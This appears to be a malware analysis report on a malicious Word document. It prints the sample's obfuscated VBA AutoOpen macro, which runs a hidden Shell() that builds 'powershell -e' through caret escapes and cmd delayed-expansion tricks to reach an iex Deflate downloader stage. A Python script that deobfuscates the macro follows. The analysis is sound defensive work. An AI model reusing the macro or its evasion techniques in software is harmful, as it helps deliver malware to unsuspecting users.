Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample contains a VBA macro whose Autoopen procedure calls FMmNtW, which calls Shell() with a window style of 56800 - 56800 = 0 (vbHide), so the command runs without a visible window. The command string is assembled from short literals spread across the functions HjcVNTZJ and JLzDCqBTAP, interleaved with no-op Hex/Cos/CDate arithmetic on unassigned variables under On Error Resume Next as padding. Its first character comes from Chr(iVdGfrhQWA + vbKeyC + OmBLzt): the two unassigned variables are Empty and contribute 0, vbKeyC is 67, so the call yields "C" and the reconstructed command begins 'Cmd DSiATmiSSHh COXCOLhtNQwLqEQwYnPmqj QcJACzKDOcqOs & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c ...'. '%^c^o^m^S^p^E^c^%' is %comSpEc% (the path to cmd.exe) with caret escapes inserted to defeat string matching; /V enables delayed environment-variable expansion and /c runs the remainder. That remainder (visible in the extracted macro below) sets a series of environment variables to the pieces p, o^w, e^r, s, he and ll, reassembles them through !%...%! delayed expansion into the word 'powershell', and passes -e with a base64 blob. The visible prefix of that blob decodes (UTF-16LE) to " &( $sHelLId[1]+$shElLiD[13]+'X')(New-ObJECt IO.cOMpreSSion.dEFLATEsTream( [" ...: $ShellId is "Microsoft.PowerShell", so the indexed characters spell ieX (Invoke-Expression) applied to a Deflate-compressed script that is cut off in the preview. This is downloader/dropper functionality; the download URL itself sits inside the compressed stage and cannot be recovered from the truncated preview. Execution depends on the user enabling macros (the AutoOpen entry point), not on a document-parser exploit, so T1204.002 (User Execution: Malicious File) describes the initial execution more precisely than T1203.
Heuristics (6)
- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description conflicts with the VBA project that was recovered from this sample (see the extracted macros.bas below); treat it as a redundant hit on the AutoOpen token rather than as evidence of a separate WordBasic macro.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into embedded drawing markup; it is not a network indicator and should not be blocklisted.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11887 bytes | 486e6cbe6f2bf23d9bddb2ded1ba04f7dfc406813a5a5e2158a1772cc580a231 |
Preview (first 1,000 lines of the extracted script; the preview is truncated):

```vba
Attribute VB_Name = "ucLncQKUY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FMmNtW()
On Error Resume Next
SjOVh = Hex(HQLfJ + Hex(ZzsswD) * 22012 + Round(uvMqwU))
kXBzjt = Cos(wWUtBN)
zOjiT = CDate(zciJnM)
IXTYYN = Cos(WsJha)
lzVYC = Hex(wUuhj + Hex(dXsIo) * 83817 + Round(WEfaD))
VnwzGE = Cos(EOKwGK)
kOUNp = CDate(LupWOD)
XDzFY = Cos(bhOzW)
FMmNtW = WnzQtcEjRi + Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + EmJIoomFn + jWpQrziTL + lQTMpXdzOkW + ohlkiCjO + OPdijVXMK, 56800 - 56800)
diIPNt = Hex(ikZHj + Hex(kQlaz) * 53832 + Round(ClaAPF))
niZWP = Cos(aMECfc)
MZhwvP = CDate(nCqGQX)
krHIzH = Cos(OvKDs)
End Function
Sub Autoopen()
On Error Resume Next
rYMiuV = Hex(XdDcEz + Hex(mlsTF) * 83607 + Round(pVwuf))
IwdXu = Cos(iwPqH)
vYPHn = CDate(DAqhcC)
wBZCCP = Cos(OzqYzj)
FMmNtW
BUUXvl = Hex(JTwhi + Hex(qfibW) * 52036 + Round(wCFuMa))
zvhrH = Cos(wCfVK)
RkoidU = CDate(zzjVP)
YAlwP = Cos(KURJNl)
End Sub
Attribute VB_Name = "abVozIQ"
Function HjcVNTZJ()
On Error Resume Next
upAobt = Hex(CcUrU + Hex(HJnaw) * 7179 + Round(BtUSf))
KVqDh = Cos(zDafF)
CniwLz = CDate(TGRrl)
FcjvA = Cos(hJPiB)
fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj"
YniUR = Hex(iizuQu + Hex(iVuLF) * 85264 + Round(EfbjPI))
KXQmE = Cos(jnLpzo)
NDYLMo = CDate(SwnzJq)
ItMCF = Cos(GTKjH)
VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s & %^c^o^" + "m^S^p^E^c^% " + " %^c^o^m^S^p^E^" + "c^% /V " + " " + "/c " + " "
RUvKF = Hex(QHQAG + Hex(TaRHL) * 69144 + Round(dOFbt))
ntjits = Cos(DBXWXo)
ltjHHm = CDate(iirzHa)
iwLsB = Cos(RSkcW)
NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk"
RMSDv = Hex(XBhkfw + Hex(GDEPp) * 59621 + Round(RZZELd))
dQTIG = Cos(wVjPav)
kZiuR = CDate(XuHMC)
zjqsmO = Cos(ROtlOb)
TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF"
NVlTp = Hex(tPBsqf + Hex(wFbVDQ) * 24559 + Round(BHczB))
dBqnUS = Cos(ABJoXN)
ihwBH = CDate(tLmXhw)
PLOIV = Cos(GPOLEW)
MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%"
szESj = Hex(CKaTJb + Hex(YpSOSG) * 42720 + Round(ionAS))
HmTWtf = Cos(jvHUqB)
EosEhf = CDate(Rzzsw)
JOJQR = Cos(zuXGw)
fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc"
vvptK = Hex(bEazpv + Hex(SnTqpU) * 59109 + Round(flVmrD))
DAjhwo = Cos(jaXmGQ)
ZJYNjw = CDate(dEimRU)
KUHSq = Cos(BZSHzu)
XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&"
HjcVNTZJ = fKhwzQizd + VAJYZkXwPzO + NYHtZWM + TTzOkRwM + MJAjq + fwCRdDF + XnOcmFF
End Function
Function JLzDCqBTAP()
On Error Resume Next
DtSCOO = Hex(FbwYK + Hex(Cawzv) * 58669 + Round(VZGQU))
RszrQ = Cos(mRXkl)
YDRKjX = CDate(IlwadV)
VaLdm = Cos(iwzJG)
BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn"
fKYmip = Hex(RWbCK + Hex(ihLiUR) * 43749 + Round(DsLGt))
jzaFIE = Cos(sYjwSl)
DqtXA = CDate(EUWUds)
ObRMjl = Cos(bUwVuG)
mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%! -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw"
qJcfBj = Hex(SNzoF + Hex(tPbGc) * 30304 + Round(kQHWS))
tqjuXd = Cos(wNKtob)
ivOSY = CDate(fzMsqt)
kGZCFN = Cos(mOjTb)
KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA"
LJfEh = Hex(ADqpC + Hex(wqBwiq) * 8038 + Round(wJpoIn))
GaQLur = Cos(QVRHL)
sbuRX = CDate(HWUqj)
PwMBUr = Cos(tpudad)
LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG"
zlafi = Hex(iflXP + Hex(QvjFm) * 69596 + Round(SfuAO ... (truncated)
```
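Reconstructing the command from the macro in code. The following Python script is an added worked example written for this report; it is not output of the analyzer and not code from the sample. It takes the string-building statements copied from the macro preview above, joins the literals, emulates the cmd.exe `/V` delayed-expansion trick (set a variable per syllable, then spell `powershell` with `!%name%!`), decodes the `-e` argument as UTF-16LE, and resolves the `$ShellId` indexing. Two assumptions: the return statement of JLzDCqBTAP is cut off in the preview, so its string variables are concatenated in assignment order; and the base64 blob ends where the preview does, so the decoded PowerShell is only a prefix. All function names in the script are the example's own; only the VBA variable names come from the macro.

```python
import base64
import re

# Copied from the extracted macro preview above (only the string assignments;
# the Hex/Cos/CDate padding lines do not affect the result). The base64 tail
# is cut where the preview is truncated.
VBA_STRING_LINES = '''
fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj"
VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s & %^c^o^" + "m^S^p^E^c^% " + " %^c^o^m^S^p^E^" + "c^% /V " + " " + "/c " + " "
NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk"
TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF"
MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%"
fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc"
XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&"
BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn"
mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%! -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw"
KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA"
LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG"
'''

# HjcVNTZJ's order is its visible return statement. JLzDCqBTAP's return
# statement is cut off in the preview, so assignment order is ASSUMED for it.
HJCVNTZJ_ORDER = ("fKhwzQizd", "VAJYZkXwPzO", "NYHtZWM", "TTzOkRwM", "MJAjq", "fwCRdDF", "XnOcmFF")
JLZDCQBTAP_ORDER = ("BpsbQCULiZM", "mkXuiDTzTc", "KCqkali", "LpDSwhYqL")


def vba_strings() -> dict:
    """Map each VBA variable to the concatenation of its "..." literals."""
    out = {}
    for line in VBA_STRING_LINES.strip().splitlines():
        name, _, expr = line.partition(" = ")
        out[name] = "".join(re.findall(r'"([^"]*)"', expr))
    return out


def rebuild_shell_argument(parts: dict) -> str:
    """Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + ..., 0):
    unassigned Variants are Empty (0 / ""), vbKeyC = 67, so Chr() yields "C"."""
    hjc = "".join(parts[k] for k in HJCVNTZJ_ORDER)
    jlz = "".join(parts[k] for k in JLZDCQBTAP_ORDER)
    return chr(67) + hjc + jlz


def emulate_cmd_v(argument: str) -> list:
    """Emulate `cmd /V /c ...` far enough to resolve the set/!var! trick.
    '^' is cmd's escape character and is dropped. In `set %NAME%=value`,
    %NAME% is undefined at parse time so cmd keeps it literally: the variable
    really is named '%NAME%'. '!NAME!' is delayed expansion, resolved when each
    &&-joined command runs. Returns the non-`set` commands cmd would execute.
    Simplification: one caret strip stands in for two cmd.exe parse passes,
    which is adequate here because no caret is itself escaped."""
    inner = re.split(r"/c\s+", argument.replace("^", ""), maxsplit=1, flags=re.I)[1]
    env, executed = {}, []
    for seg in re.split(r"&&?", inner):
        seg = re.sub(r"!([^!]+)!", lambda m: env.get(m.group(1), m.group(0)), seg).strip()
        if not seg:
            continue
        if seg[:4].lower() == "set ":
            name, _, value = seg[4:].partition("=")
            env[name.strip()] = value
        else:
            executed.append(seg)
    return executed


def decode_encoded_command(command: str) -> str:
    """Decode a `powershell -e <base64>` argument (UTF-16LE), tolerating truncation."""
    b64 = re.search(r"-e\s+([A-Za-z0-9+/=]+)", command, re.I).group(1)
    b64 = b64[: len(b64) - len(b64) % 4]            # drop the incomplete final quantum
    raw = base64.b64decode(b64)
    return raw[: len(raw) & ~1].decode("utf-16-le")  # drop a dangling half code unit


def resolve_shellid_trick(script: str) -> str:
    """$ShellId is 'Microsoft.PowerShell' in powershell.exe; the script indexes
    into it so 'iex' never appears literally. Substitute the characters and
    fold the 'a'+'b' string arithmetic so the alias reads as one token."""
    shell_id = "Microsoft.PowerShell"
    s = re.sub(r"\$shellid\[(\d+)\]", lambda m: f"'{shell_id[int(m.group(1))]}'", script, flags=re.I)
    while True:
        folded = re.sub(r"'([^']*)'\+'([^']*)'", r"'\1\2'", s)
        if folded == s:
            return s
        s = folded


def analyze() -> dict:
    parts = vba_strings()
    argument = rebuild_shell_argument(parts)
    executed = emulate_cmd_v(argument)
    decoded = decode_encoded_command(executed[-1])
    return {"shell_argument": argument, "executed": executed,
            "decoded": decoded, "resolved": resolve_shellid_trick(decoded)}


if __name__ == "__main__":
    result = analyze()
    print("Shell() argument :", result["shell_argument"])
    print("cmd executes     :", result["executed"])
    print("decoded -e prefix:", result["resolved"])
```

Running it prints the full Shell() argument, the single command cmd.exe ends up executing (`powershell -e IAAm...`), and the decoded prefix with the alias resolved to `ieX`. For another sample from the same family, replace VBA_STRING_LINES with the string assignments from its olevba output and adjust the two order tuples; the environment-variable emulation is generic and handles however many syllables the builder uses.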